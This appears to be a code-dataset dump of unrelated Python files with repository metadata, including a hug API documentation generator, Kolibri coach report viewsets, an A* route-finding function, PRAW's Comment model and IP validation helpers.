**await self.api.request(
"DELETE", f"payment-notifier/v1/hooks/{hook_id}",
params
)
)
async def trigger(
self,
**kwargs,
) -> hook.ResponseModel:
params = self.get_set_params(locals())
return hook.ResponseModel(
**await self.api.request(
"GET", "payment-notifier/v1/hooks/test",
params
)
)
| 1,330 | 4 | 139 |
d788a229f5971b43b029ba0f7cd215f7e844b9c5 | 4,328 | py | Python | hug/documentation.py | alisaifee/hug | bfd9b56fb5ce2a8c994219fa5941c28bc7f37bab | [
"MIT"
] | null | null | null | hug/documentation.py | alisaifee/hug | bfd9b56fb5ce2a8c994219fa5941c28bc7f37bab | [
"MIT"
] | null | null | null | hug/documentation.py | alisaifee/hug | bfd9b56fb5ce2a8c994219fa5941c28bc7f37bab | [
"MIT"
] | null | null | null | """hug/documentation.py
Defines tools that automate the creation of documentation for an API build using the Hug Framework
Copyright (C) 2015 Timothy Edmund Crosley
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
from collections import OrderedDict
import hug.types
def generate(module, base_url="", api_version=None):
'''Generates documentation based on a Hug API module, base_url, and api_version (if applicable)'''
documentation = OrderedDict()
overview = module.__doc__
if overview:
documentation['overview'] = overview
documentation['versions'] = OrderedDict()
versions = module.__hug__.versions
for version in (api_version, ) if api_version else versions:
documentation['versions'][version] = OrderedDict()
for url, methods in module.__hug__.routes.items():
for method, versions in methods.items():
for version, handler in versions.items():
if version == None:
applies_to = versions
else:
applies_to = (version, )
for version in applies_to:
if api_version and version != api_version:
continue
doc = documentation['versions'][version].setdefault(url, OrderedDict())
doc = doc.setdefault(method, OrderedDict())
usage = handler.api_function.__doc__
if usage:
doc['usage'] = usage
for example in handler.examples:
example_text = "{0}{1}{2}".format(base_url, '/v{0}'.format(version) if version else '', url)
if isinstance(example, str):
example_text += "?{0}".format(example)
doc_examples = doc.setdefault('examples', [])
if not example_text in doc_examples:
doc_examples.append(example_text)
doc['outputs'] = OrderedDict(format=handler.output_format.__doc__,
content_type=handler.content_type)
parameters = [param for param in handler.accepted_parameters if not param in ('request',
'response')
and not param.startswith('hug_')]
if parameters:
inputs = doc.setdefault('inputs', OrderedDict())
types = handler.api_function.__annotations__
for argument in parameters:
input_definition = inputs.setdefault(argument, OrderedDict())
input_definition['type'] = types.get(argument, hug.types.text).__doc__
default = handler.defaults.get(argument, None)
if default is not None:
input_definition['default'] = default
if len(documentation['versions']) == 1:
documentation.update(tuple(documentation['versions'].values())[0])
documentation.pop('versions')
else:
documentation['versions'].pop(None, '')
return documentation
| 50.325581 | 117 | 0.597043 | """hug/documentation.py
Defines tools that automate the creation of documentation for an API build using the Hug Framework
Copyright (C) 2015 Timothy Edmund Crosley
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
from collections import OrderedDict
import hug.types
def generate(module, base_url="", api_version=None):
'''Generates documentation based on a Hug API module, base_url, and api_version (if applicable)'''
documentation = OrderedDict()
overview = module.__doc__
if overview:
documentation['overview'] = overview
documentation['versions'] = OrderedDict()
versions = module.__hug__.versions
for version in (api_version, ) if api_version else versions:
documentation['versions'][version] = OrderedDict()
for url, methods in module.__hug__.routes.items():
for method, versions in methods.items():
for version, handler in versions.items():
if version == None:
applies_to = versions
else:
applies_to = (version, )
for version in applies_to:
if api_version and version != api_version:
continue
doc = documentation['versions'][version].setdefault(url, OrderedDict())
doc = doc.setdefault(method, OrderedDict())
usage = handler.api_function.__doc__
if usage:
doc['usage'] = usage
for example in handler.examples:
example_text = "{0}{1}{2}".format(base_url, '/v{0}'.format(version) if version else '', url)
if isinstance(example, str):
example_text += "?{0}".format(example)
doc_examples = doc.setdefault('examples', [])
if not example_text in doc_examples:
doc_examples.append(example_text)
doc['outputs'] = OrderedDict(format=handler.output_format.__doc__,
content_type=handler.content_type)
parameters = [param for param in handler.accepted_parameters if not param in ('request',
'response')
and not param.startswith('hug_')]
if parameters:
inputs = doc.setdefault('inputs', OrderedDict())
types = handler.api_function.__annotations__
for argument in parameters:
input_definition = inputs.setdefault(argument, OrderedDict())
input_definition['type'] = types.get(argument, hug.types.text).__doc__
default = handler.defaults.get(argument, None)
if default is not None:
input_definition['default'] = default
if len(documentation['versions']) == 1:
documentation.update(tuple(documentation['versions'].values())[0])
documentation.pop('versions')
else:
documentation['versions'].pop(None, '')
return documentation
| 0 | 0 | 0 |
c0a073a2a76e8d22abebee5090e5a9a433d0dde2 | 257 | py | Python | src/tests/common_test.py | bronger/bobcat | 93e1cc88069001268824bc832490fd8db178848c | [
"MIT"
] | null | null | null | src/tests/common_test.py | bronger/bobcat | 93e1cc88069001268824bc832490fd8db178848c | [
"MIT"
] | null | null | null | src/tests/common_test.py | bronger/bobcat | 93e1cc88069001268824bc832490fd8db178848c | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os.path
testmodules_path = os.path.dirname(os.path.abspath(__file__))
rootpath = os.path.split(testmodules_path)[0]
sys.path.append(rootpath)
| 23.363636 | 61 | 0.735409 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os.path
testmodules_path = os.path.dirname(os.path.abspath(__file__))
rootpath = os.path.split(testmodules_path)[0]
sys.path.append(rootpath)
def chdir_to_testbed():
os.chdir(testmodules_path)
| 33 | 0 | 23 |
a5e4382e2fe1aea2bd047a8db71a62a40e246774 | 476 | py | Python | kattis/k_apaxiaaans.py | ivanlyon/exercises | 0792976ae2acb85187b26a52812f9ebdd119b5e8 | [
"MIT"
] | null | null | null | kattis/k_apaxiaaans.py | ivanlyon/exercises | 0792976ae2acb85187b26a52812f9ebdd119b5e8 | [
"MIT"
] | null | null | null | kattis/k_apaxiaaans.py | ivanlyon/exercises | 0792976ae2acb85187b26a52812f9ebdd119b5e8 | [
"MIT"
] | null | null | null | '''
No problem, just process
Status: Accepted
'''
###############################################################################
def main():
"""Read input and print output"""
result = ''
for i in input():
if result:
if i != result[-1]:
result += i
else:
result = i
print(result)
###############################################################################
if __name__ == '__main__':
main()
| 19.04 | 79 | 0.315126 | '''
No problem, just process
Status: Accepted
'''
###############################################################################
def main():
"""Read input and print output"""
result = ''
for i in input():
if result:
if i != result[-1]:
result += i
else:
result = i
print(result)
###############################################################################
if __name__ == '__main__':
main()
| 0 | 0 | 0 |
1b985080d7fa8e77186bd6fbe6fb9bd100a355a6 | 386 | py | Python | lab5/DeanerySystem/day.py | R3zn0w/blue-rapier | 84cdc33e1e327c0a402a4d2e29a8d6f5cda95e9b | [
"MIT"
] | null | null | null | lab5/DeanerySystem/day.py | R3zn0w/blue-rapier | 84cdc33e1e327c0a402a4d2e29a8d6f5cda95e9b | [
"MIT"
] | null | null | null | lab5/DeanerySystem/day.py | R3zn0w/blue-rapier | 84cdc33e1e327c0a402a4d2e29a8d6f5cda95e9b | [
"MIT"
] | null | null | null | from enum import Enum
| 15.44 | 43 | 0.443005 | from enum import Enum
class Day(Enum):
MON = 1
TUE = 2
WED = 3
THU = 4
FRI = 5
SAT = 6
SUN = 7
def difference(self, day):
d = day.value - self.value
if d > 3:
return d - 7
elif d < -3:
return d + 7
else:
return d
def nthDayFrom(n, day):
return Day((n - 1 + day.value) % 7 + 1)
| 210 | 106 | 46 |
8310fa13339108f5a042b8ebfc3966a35442df24 | 6,667 | py | Python | kolibri/plugins/coach/api.py | bonidjukic/kolibri | bbc6266b02da0cba7cb94c6eeb1b66d5e31d47f5 | [
"MIT"
] | null | null | null | kolibri/plugins/coach/api.py | bonidjukic/kolibri | bbc6266b02da0cba7cb94c6eeb1b66d5e31d47f5 | [
"MIT"
] | 3 | 2016-05-24T21:12:01.000Z | 2017-03-09T22:43:08.000Z | kolibri/plugins/coach/api.py | DXCanas/kolibri | 4571fc5e5482a2dc9cd8f93dd45222a69d8a68b4 | [
"MIT"
] | null | null | null | import datetime
from dateutil.parser import parse
from django.db import connection
from django.db.models import Min
from django.db.models import Q
from django.utils import timezone
from rest_framework import mixins
from rest_framework import pagination
from rest_framework import permissions
from rest_framework import viewsets
from .serializers import ContentReportSerializer
from .serializers import ContentSummarySerializer
from .serializers import LessonReportSerializer
from .serializers import UserReportSerializer
from .utils.return_users import get_members_or_user
from kolibri.core.auth.constants import collection_kinds
from kolibri.core.auth.constants import role_kinds
from kolibri.core.auth.models import Collection
from kolibri.core.auth.models import FacilityUser
from kolibri.core.content.models import ContentNode
from kolibri.core.decorators import query_params_required
from kolibri.core.lessons.models import Lesson
from kolibri.core.logger.models import ContentSummaryLog
from kolibri.core.logger.models import MasteryLog
collection_kind_choices = tuple([choice[0] for choice in collection_kinds.choices] + ['user'])
class OptionalPageNumberPagination(pagination.PageNumberPagination):
"""
Pagination class that allows for page number-style pagination, when requested.
To activate, the `page_size` argument must be set. For example, to request the first 20 records:
`?page_size=20&page=1`
"""
page_size = None
page_size_query_param = "page_size"
# check if requesting user has permission for collection or user
@query_params_required(channel_id=str, content_node_id=str, collection_kind=collection_kind_choices, collection_id=str)
@query_params_required(channel_id=str, collection_kind=collection_kind_choices, collection_id=str)
| 45.664384 | 122 | 0.744563 | import datetime
from dateutil.parser import parse
from django.db import connection
from django.db.models import Min
from django.db.models import Q
from django.utils import timezone
from rest_framework import mixins
from rest_framework import pagination
from rest_framework import permissions
from rest_framework import viewsets
from .serializers import ContentReportSerializer
from .serializers import ContentSummarySerializer
from .serializers import LessonReportSerializer
from .serializers import UserReportSerializer
from .utils.return_users import get_members_or_user
from kolibri.core.auth.constants import collection_kinds
from kolibri.core.auth.constants import role_kinds
from kolibri.core.auth.models import Collection
from kolibri.core.auth.models import FacilityUser
from kolibri.core.content.models import ContentNode
from kolibri.core.decorators import query_params_required
from kolibri.core.lessons.models import Lesson
from kolibri.core.logger.models import ContentSummaryLog
from kolibri.core.logger.models import MasteryLog
collection_kind_choices = tuple([choice[0] for choice in collection_kinds.choices] + ['user'])
class OptionalPageNumberPagination(pagination.PageNumberPagination):
"""
Pagination class that allows for page number-style pagination, when requested.
To activate, the `page_size` argument must be set. For example, to request the first 20 records:
`?page_size=20&page=1`
"""
page_size = None
page_size_query_param = "page_size"
class KolibriReportPermissions(permissions.BasePermission):
# check if requesting user has permission for collection or user
def has_permission(self, request, view):
if isinstance(view, LessonReportViewset):
report_pk = view.kwargs.get('pk', None)
if report_pk is None:
# If requesting list view, check if requester has coach/admin permissions on whole facility
collection_kind = 'facility'
collection_or_user_pk = request.user.facility_id
else:
# If requesting detail view, only check if requester has permissions on the Classroom
collection_kind = 'classroom'
collection_or_user_pk = Lesson.objects.get(pk=report_pk).collection.id
else:
collection_kind = view.kwargs.get('collection_kind', 'user')
collection_or_user_pk = view.kwargs.get('collection_id', view.kwargs.get('pk'))
allowed_roles = [role_kinds.ADMIN, role_kinds.COACH]
try:
if 'user' == collection_kind:
return request.user.has_role_for(allowed_roles, FacilityUser.objects.get(pk=collection_or_user_pk))
else:
return request.user.has_role_for(allowed_roles, Collection.objects.get(pk=collection_or_user_pk))
except (FacilityUser.DoesNotExist, Collection.DoesNotExist):
return False
@query_params_required(channel_id=str, content_node_id=str, collection_kind=collection_kind_choices, collection_id=str)
class ReportBaseViewSet(mixins.ListModelMixin, viewsets.GenericViewSet):
permission_classes = (KolibriReportPermissions,)
class UserReportViewSet(ReportBaseViewSet):
pagination_class = OptionalPageNumberPagination
serializer_class = UserReportSerializer
def get_queryset(self):
assert 'user' != self.kwargs['collection_kind'], 'only a `collection` should be passed to this endpoint'
return get_members_or_user(self.kwargs['collection_kind'], self.kwargs['collection_id'])
class ContentReportViewSet(ReportBaseViewSet):
pagination_class = OptionalPageNumberPagination
serializer_class = ContentReportSerializer
def get_queryset(self):
content_node_id = self.kwargs['content_node_id']
return ContentNode.objects.filter(Q(parent=content_node_id) & Q(available=True)).order_by('lft')
@query_params_required(channel_id=str, collection_kind=collection_kind_choices, collection_id=str)
class ContentSummaryViewSet(viewsets.ReadOnlyModelViewSet):
permission_classes = (KolibriReportPermissions,)
serializer_class = ContentSummarySerializer
def get_queryset(self):
channel_id = self.kwargs['channel_id']
return ContentNode.objects.filter(Q(channel_id=channel_id) & Q(available=True)).order_by('lft')
class RecentReportViewSet(ReportBaseViewSet):
pagination_class = OptionalPageNumberPagination
serializer_class = ContentReportSerializer
def get_queryset(self):
channel_id = self.kwargs['channel_id']
attempted_mastery_logs = MasteryLog.objects.filter(attemptlogs__isnull=False)
query_node = ContentNode.objects.get(pk=self.kwargs['content_node_id'])
if self.request.query_params.get('last_active_time'):
# Last active time specified
datetime_cutoff = parse(self.request.query_params.get('last_active_time'))
else:
datetime_cutoff = timezone.now() - datetime.timedelta(7)
# Set on the kwargs to pass into the serializer
self.kwargs['last_active_time'] = datetime_cutoff.isoformat()
recent_content_items = ContentSummaryLog.objects.filter_by_topic(query_node).filter(
Q(progress__gt=0) | Q(masterylogs__in=attempted_mastery_logs),
user__in=list(get_members_or_user(self.kwargs['collection_kind'], self.kwargs['collection_id'])),
end_timestamp__gte=datetime_cutoff).values_list('content_id', flat=True)
if connection.vendor == 'postgresql':
pks_with_unique_content_ids = ContentNode.objects.order_by('content_id').distinct('content_id').filter(
channel_id=channel_id, content_id__in=recent_content_items).values_list('pk', flat=True)
else:
# note from rtibbles:
# As good as either I or jamalex could come up with to ensure that we only return
# unique content_id'ed ContentNodes from the coach recent report endpoint.
# Would have loved to use distinct('content_id'), but unfortunately DISTINCT ON is Postgresql only
pks_with_unique_content_ids = ContentNode.objects.filter(
channel_id=channel_id, content_id__in=recent_content_items).values('content_id').order_by('lft').annotate(
pk=Min('pk')).values_list('pk', flat=True)
return ContentNode.objects.filter(pk__in=pks_with_unique_content_ids).order_by('lft')
class LessonReportViewset(viewsets.ReadOnlyModelViewSet):
permission_classes = (permissions.IsAuthenticated, KolibriReportPermissions,)
serializer_class = LessonReportSerializer
queryset = Lesson.objects.all()
| 3,724 | 959 | 185 |
0694d04650787688fa74a9c2b1229237ea3faa9f | 2,412 | py | Python | src/student_code.py | azarrias/udacity-nd256-project4 | 295db734b854b477095cf8441498f72ade1ae03c | [
"MIT"
] | null | null | null | src/student_code.py | azarrias/udacity-nd256-project4 | 295db734b854b477095cf8441498f72ade1ae03c | [
"MIT"
] | null | null | null | src/student_code.py | azarrias/udacity-nd256-project4 | 295db734b854b477095cf8441498f72ade1ae03c | [
"MIT"
] | null | null | null | from math import sqrt
from collections import deque
# sort using g + h costs
# implement A* seaarch algorithm
# use euclidean distance to the goal node to determine the h value
# use stack to retrieve elements in reverse order | 37.107692 | 113 | 0.639718 | from math import sqrt
from collections import deque
class Node:
def __init__(self, _id):
self.id = _id
self.parent = None
self.g_value = 0
self.h_value = 0
# sort using g + h costs
def __lt__(self, other):
return self.g_value + self.h_value < other.g_value + other.h_value
def __eq__(self, other):
return self.id == other.id
# implement A* seaarch algorithm
def shortest_path(M, start, goal):
print("shortest path called")
# use min heap for the priority queue
start_node = Node(start)
start_node.g_value = 0
start_node.h_value = euclidean_distance(M, start, goal)
open_set = {}
closed_set = {}
open_set[start] = start_node
while len(open_set) > 0:
current_node = sorted(open_set.values())[0]
if current_node.id == goal:
return calculate_path(current_node, start)
open_set.pop(current_node.id)
closed_set[current_node.id] = current_node
# add neighbours of the current node
for neighbour in M.roads[current_node.id]:
if neighbour in closed_set:
continue
if neighbour in open_set:
neighbour_node = open_set[neighbour]
new_g_val = current_node.g_value + euclidean_distance(M, current_node.id, neighbour)
if new_g_val < neighbour_node.g_value:
neighbour_node.parent = current_node
neighbour_node.g_value = new_g_val
else:
neighbour_node = Node(neighbour)
neighbour_node.parent = current_node
neighbour_node.h_value = euclidean_distance(M, neighbour, goal)
neighbour_node.g_value = current_node.g_value + euclidean_distance(M, current_node.id, neighbour)
open_set[neighbour] = neighbour_node
# use euclidean distance to the goal node to determine the h value
def euclidean_distance(M, node1, node2):
x1, y1 = M._graph.node[node1]['pos']
x2, y2 = M._graph.node[node2]['pos']
return sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)
# use stack to retrieve elements in reverse order
def calculate_path(current_node, start_node):
path = deque()
while current_node.id != start_node:
path.appendleft(current_node.id)
current_node = current_node.parent
path.appendleft(current_node.id)
return list(path) | 2,020 | -10 | 168 |
51d9098bcedee877280944be77e98d7906ec131c | 6,436 | py | Python | venv/lib/python3.5/site-packages/praw/models/reddit/comment.py | cssidy/python-reddit | b9ec30662032993bb55c93aee5e2321fdbd5bf0c | [
"MIT"
] | null | null | null | venv/lib/python3.5/site-packages/praw/models/reddit/comment.py | cssidy/python-reddit | b9ec30662032993bb55c93aee5e2321fdbd5bf0c | [
"MIT"
] | null | null | null | venv/lib/python3.5/site-packages/praw/models/reddit/comment.py | cssidy/python-reddit | b9ec30662032993bb55c93aee5e2321fdbd5bf0c | [
"MIT"
] | null | null | null | """Provide the Comment class."""
from ...const import urljoin
from ...exceptions import ClientException
from ..comment_forest import CommentForest
from .base import RedditBase
from .mixins import InboxableMixin, ThingModerationMixin, UserContentMixin
from .redditor import Redditor
class Comment(RedditBase, InboxableMixin, UserContentMixin):
"""A class that represents a reddit comments."""
STR_FIELD = 'id'
@property
def is_root(self):
"""Return True when the comment is a top level comment."""
parent_type = self.parent_id.split('_', 1)[0]
return parent_type == self._reddit.config.kinds['submission']
@property
def mod(self):
"""An instance of :class:`.CommentModeration`."""
if self._mod is None:
self._mod = CommentModeration(self)
return self._mod
@property
def replies(self):
"""An instance of :class:`.CommentForest`."""
if isinstance(self._replies, list):
self._replies = CommentForest(self.submission, self._replies)
return self._replies
@property
def submission(self):
"""Return the Submission object this comment belongs to."""
if not self._submission: # Comment not from submission
self._submission = self._reddit.submission(
self.link_id.split('_', 1)[1])
return self._submission
@submission.setter
def submission(self, submission):
"""Update the Submission associated with the Comment."""
assert self.name not in submission._comments_by_id
submission._comments_by_id[self.name] = self
self._submission = submission
for reply in getattr(self, 'replies', []):
reply.submission = submission
def __init__(self, reddit, id=None, # pylint: disable=redefined-builtin
_data=None):
"""Construct an instance of the Comment object."""
if bool(id) == bool(_data):
raise TypeError('Either `id` or `_data` must be provided.')
self._mod = self._replies = self._submission = None
super(Comment, self).__init__(reddit, _data)
if id:
self.id = id # pylint: disable=invalid-name
else:
self._fetched = True
def __setattr__(self, attribute, value):
"""Objectify author, replies, and subreddit."""
# pylint: disable=redefined-variable-type
if attribute == 'author':
value = Redditor.from_data(self._reddit, value)
elif attribute == 'replies':
if value == '':
value = []
else:
value = self._reddit._objector.objectify(value).children
attribute = '_replies'
elif attribute == 'subreddit':
value = self._reddit.subreddit(value)
super(Comment, self).__setattr__(attribute, value)
def parent(self):
"""Return the parent of the comment.
The returned parent will be an instance of either
:class:`.Comment`, or :class:`.Submission`.
If this comment was obtained through a :class:`.Submission`, then its
entire ancestry should be immediately available, requiring no extra
network requests. However, if this comment was obtained through other
means, e.g., ``reddit.comment('COMMENT_ID')``, or
``reddit.inbox.comment_replies``, then the returned parent may be a
lazy instance of either :class:`.Comment`, or :class:`.Submission`.
Lazy Comment Example:
.. code:: python
comment = reddit.comment('cklhv0f')
parent = comment.parent()
# `replies` is empty until the comment is refreshed
print(parent.replies) # Output: []
parent.refresh()
print(parent.replies) # Output is at least: [Comment(id='cklhv0f')]
"""
# pylint: disable=no-member
if self.parent_id == self.submission.fullname:
return self.submission
if '_comments' in self.submission.__dict__ \
and self.parent_id in self.submission._comments_by_id:
# The Comment already exists, so simply return it
return self.submission._comments_by_id[self.parent_id]
# pylint: enable=no-member
parent = Comment(self._reddit, self.parent_id.split('_', 1)[1])
parent._submission = self.submission
return parent
def permalink(self, fast=False):
"""Return a permalink to the comment.
:param fast: Return the result as quickly as possible (default: False).
In order to determine the full permalink for a comment, the Submission
may need to be fetched if it hasn't been already. Set ``fast=True`` if
you want to bypass that possible load.
A full permalink looks like:
/r/redditdev/comments/2gmzqe/praw_https_enabled/cklhv0f
A fast-loaded permalink for the same comment will look like:
/comments/2gmzqe//cklhv0f
"""
# pylint: disable=no-member
if not fast or 'permalink' in self.submission.__dict__:
return urljoin(self.submission.permalink, self.id)
return '/comments/{}//{}'.format(self.submission.id, self.id)
def refresh(self):
"""Refresh the comment's attributes.
If using :meth:`.Reddit.comment` this method must be called in order to
obtain the comment's replies.
"""
if 'context' in self.__dict__: # Using hasattr triggers a fetch
comment_path = self.context.split('?', 1)[0]
else:
comment_path = '{}_/{}'.format(
self.submission._info_path(), # pylint: disable=no-member
self.id)
comment_list = self._reddit.get(comment_path)[1].children
if not comment_list:
raise ClientException('Comment has been deleted')
comment = comment_list[0]
for reply in comment._replies:
reply.submission = self.submission
del comment.__dict__['_submission'] # Don't replace
self.__dict__.update(comment.__dict__)
return self
class CommentModeration(ThingModerationMixin):
"""Provide a set of functions pertaining to Comment moderation."""
def __init__(self, comment):
"""Create a CommentModeration instance.
:param comment: The comment to moderate.
"""
self.thing = comment
| 37.202312 | 79 | 0.629117 | """Provide the Comment class."""
from ...const import urljoin
from ...exceptions import ClientException
from ..comment_forest import CommentForest
from .base import RedditBase
from .mixins import InboxableMixin, ThingModerationMixin, UserContentMixin
from .redditor import Redditor
class Comment(RedditBase, InboxableMixin, UserContentMixin):
"""A class that represents a reddit comments."""
STR_FIELD = 'id'
@property
def is_root(self):
"""Return True when the comment is a top level comment."""
parent_type = self.parent_id.split('_', 1)[0]
return parent_type == self._reddit.config.kinds['submission']
@property
def mod(self):
"""An instance of :class:`.CommentModeration`."""
if self._mod is None:
self._mod = CommentModeration(self)
return self._mod
@property
def replies(self):
"""An instance of :class:`.CommentForest`."""
if isinstance(self._replies, list):
self._replies = CommentForest(self.submission, self._replies)
return self._replies
@property
def submission(self):
"""Return the Submission object this comment belongs to."""
if not self._submission: # Comment not from submission
self._submission = self._reddit.submission(
self.link_id.split('_', 1)[1])
return self._submission
@submission.setter
def submission(self, submission):
"""Update the Submission associated with the Comment."""
assert self.name not in submission._comments_by_id
submission._comments_by_id[self.name] = self
self._submission = submission
for reply in getattr(self, 'replies', []):
reply.submission = submission
def __init__(self, reddit, id=None, # pylint: disable=redefined-builtin
_data=None):
"""Construct an instance of the Comment object."""
if bool(id) == bool(_data):
raise TypeError('Either `id` or `_data` must be provided.')
self._mod = self._replies = self._submission = None
super(Comment, self).__init__(reddit, _data)
if id:
self.id = id # pylint: disable=invalid-name
else:
self._fetched = True
def __setattr__(self, attribute, value):
"""Objectify author, replies, and subreddit."""
# pylint: disable=redefined-variable-type
if attribute == 'author':
value = Redditor.from_data(self._reddit, value)
elif attribute == 'replies':
if value == '':
value = []
else:
value = self._reddit._objector.objectify(value).children
attribute = '_replies'
elif attribute == 'subreddit':
value = self._reddit.subreddit(value)
super(Comment, self).__setattr__(attribute, value)
def parent(self):
"""Return the parent of the comment.
The returned parent will be an instance of either
:class:`.Comment`, or :class:`.Submission`.
If this comment was obtained through a :class:`.Submission`, then its
entire ancestry should be immediately available, requiring no extra
network requests. However, if this comment was obtained through other
means, e.g., ``reddit.comment('COMMENT_ID')``, or
``reddit.inbox.comment_replies``, then the returned parent may be a
lazy instance of either :class:`.Comment`, or :class:`.Submission`.
Lazy Comment Example:
.. code:: python
comment = reddit.comment('cklhv0f')
parent = comment.parent()
# `replies` is empty until the comment is refreshed
print(parent.replies) # Output: []
parent.refresh()
print(parent.replies) # Output is at least: [Comment(id='cklhv0f')]
"""
# pylint: disable=no-member
if self.parent_id == self.submission.fullname:
return self.submission
if '_comments' in self.submission.__dict__ \
and self.parent_id in self.submission._comments_by_id:
# The Comment already exists, so simply return it
return self.submission._comments_by_id[self.parent_id]
# pylint: enable=no-member
parent = Comment(self._reddit, self.parent_id.split('_', 1)[1])
parent._submission = self.submission
return parent
def permalink(self, fast=False):
"""Return a permalink to the comment.
:param fast: Return the result as quickly as possible (default: False).
In order to determine the full permalink for a comment, the Submission
may need to be fetched if it hasn't been already. Set ``fast=True`` if
you want to bypass that possible load.
A full permalink looks like:
/r/redditdev/comments/2gmzqe/praw_https_enabled/cklhv0f
A fast-loaded permalink for the same comment will look like:
/comments/2gmzqe//cklhv0f
"""
# pylint: disable=no-member
if not fast or 'permalink' in self.submission.__dict__:
return urljoin(self.submission.permalink, self.id)
return '/comments/{}//{}'.format(self.submission.id, self.id)
def refresh(self):
"""Refresh the comment's attributes.
If using :meth:`.Reddit.comment` this method must be called in order to
obtain the comment's replies.
"""
if 'context' in self.__dict__: # Using hasattr triggers a fetch
comment_path = self.context.split('?', 1)[0]
else:
comment_path = '{}_/{}'.format(
self.submission._info_path(), # pylint: disable=no-member
self.id)
comment_list = self._reddit.get(comment_path)[1].children
if not comment_list:
raise ClientException('Comment has been deleted')
comment = comment_list[0]
for reply in comment._replies:
reply.submission = self.submission
del comment.__dict__['_submission'] # Don't replace
self.__dict__.update(comment.__dict__)
return self
class CommentModeration(ThingModerationMixin):
"""Provide a set of functions pertaining to Comment moderation."""
def __init__(self, comment):
"""Create a CommentModeration instance.
:param comment: The comment to moderate.
"""
self.thing = comment
| 0 | 0 | 0 |
4745880a71149ff8c4b63d9e2ab860d088aa92ed | 1,290 | py | Python | venv/Lib/site-packages/networkutil/validation.py | avim2809/CameraSiteBlocker | bfc0434e75e8f3f95c459a4adc86b7673200816e | [
"Apache-2.0"
] | null | null | null | venv/Lib/site-packages/networkutil/validation.py | avim2809/CameraSiteBlocker | bfc0434e75e8f3f95c459a4adc86b7673200816e | [
"Apache-2.0"
] | null | null | null | venv/Lib/site-packages/networkutil/validation.py | avim2809/CameraSiteBlocker | bfc0434e75e8f3f95c459a4adc86b7673200816e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Description: validation functions
from ipaddress import (AddressValueError, NetmaskValueError,
ip_address, IPv4Address, IPv6Address,
ip_network, IPv4Network, IPv6Network)
| 23.454545 | 73 | 0.53876 | # -*- coding: utf-8 -*-
# Description: validation functions
from ipaddress import (AddressValueError, NetmaskValueError,
ip_address, IPv4Address, IPv6Address,
ip_network, IPv4Network, IPv6Network)
def valid_ip(ip,
method=ip_address):
try:
method(u'{ip}'.format(ip=ip))
return True
except (ValueError, AddressValueError):
return False
def valid_ipv4(ip):
return valid_ip(ip=ip,
method=IPv4Address)
def valid_ipv6(ip):
return valid_ip(ip=ip,
method=IPv6Address)
def valid_ip_network(network,
method=ip_network,
strict=True):
try:
method(u'{net}'.format(net=network),
strict=strict)
return True
except (ValueError, TypeError, AddressValueError, NetmaskValueError):
return False
def valid_ipv4_network(*args,
**kwargs):
return valid_ip_network(method=IPv4Network,
*args,
**kwargs)
def valid_ipv6_network(*args,
**kwargs):
return valid_ip_network(method=IPv6Network,
*args,
**kwargs)
| 902 | 0 | 138 |
63728377d479403422a92ef81174df58b96731e3 | 433 | py | Python | nekumo/api/__init__.py | Nekmo/nekumo | 4e0b63de0794a23dbe43eebd88124edd11045cb0 | [
"MIT"
] | null | null | null | nekumo/api/__init__.py | Nekmo/nekumo | 4e0b63de0794a23dbe43eebd88124edd11045cb0 | [
"MIT"
] | 1 | 2016-03-31T17:57:15.000Z | 2016-03-31T17:57:15.000Z | nekumo/api/__init__.py | Nekmo/nekumo | 4e0b63de0794a23dbe43eebd88124edd11045cb0 | [
"MIT"
] | null | null | null | from nekumo.api.config import QuickStart
from nekumo.api.nodes import Dir, File, Node, Image, Video
__author__ = 'nekmo'
stanza_classes = [
# Este listado se recorre para determinar el tipo de clase mejor a usar
# con un nodo. Se usa un método estático is_capable para determinarlo.
# Por ejemplo, tendremos clases Dir y File, con métodos distintos.
QuickStart,
Image,
Video,
Dir,
File,
Node,
] | 25.470588 | 75 | 0.704388 | from nekumo.api.config import QuickStart
from nekumo.api.nodes import Dir, File, Node, Image, Video
__author__ = 'nekmo'
stanza_classes = [
# Este listado se recorre para determinar el tipo de clase mejor a usar
# con un nodo. Se usa un método estático is_capable para determinarlo.
# Por ejemplo, tendremos clases Dir y File, con métodos distintos.
QuickStart,
Image,
Video,
Dir,
File,
Node,
] | 0 | 0 | 0 |
